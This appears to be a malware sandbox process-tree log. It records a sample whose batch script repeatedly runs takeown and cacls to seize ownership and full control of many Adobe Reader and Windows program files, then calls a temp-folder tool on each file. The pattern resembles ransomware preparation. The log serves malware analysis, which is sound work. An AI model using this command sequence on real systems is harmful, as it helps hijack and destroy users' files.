C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "rss.gif" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "rss.gif" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SY______.PFM" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can129.hsp" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can129.hsp" -nobanner4⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "eula.ini" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "eula.ini" -nobanner4⤵PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""2⤵PID:1768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wab.exe" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wab.exe" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "main.css" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "main.css" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "review_shared.gif" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1364
-
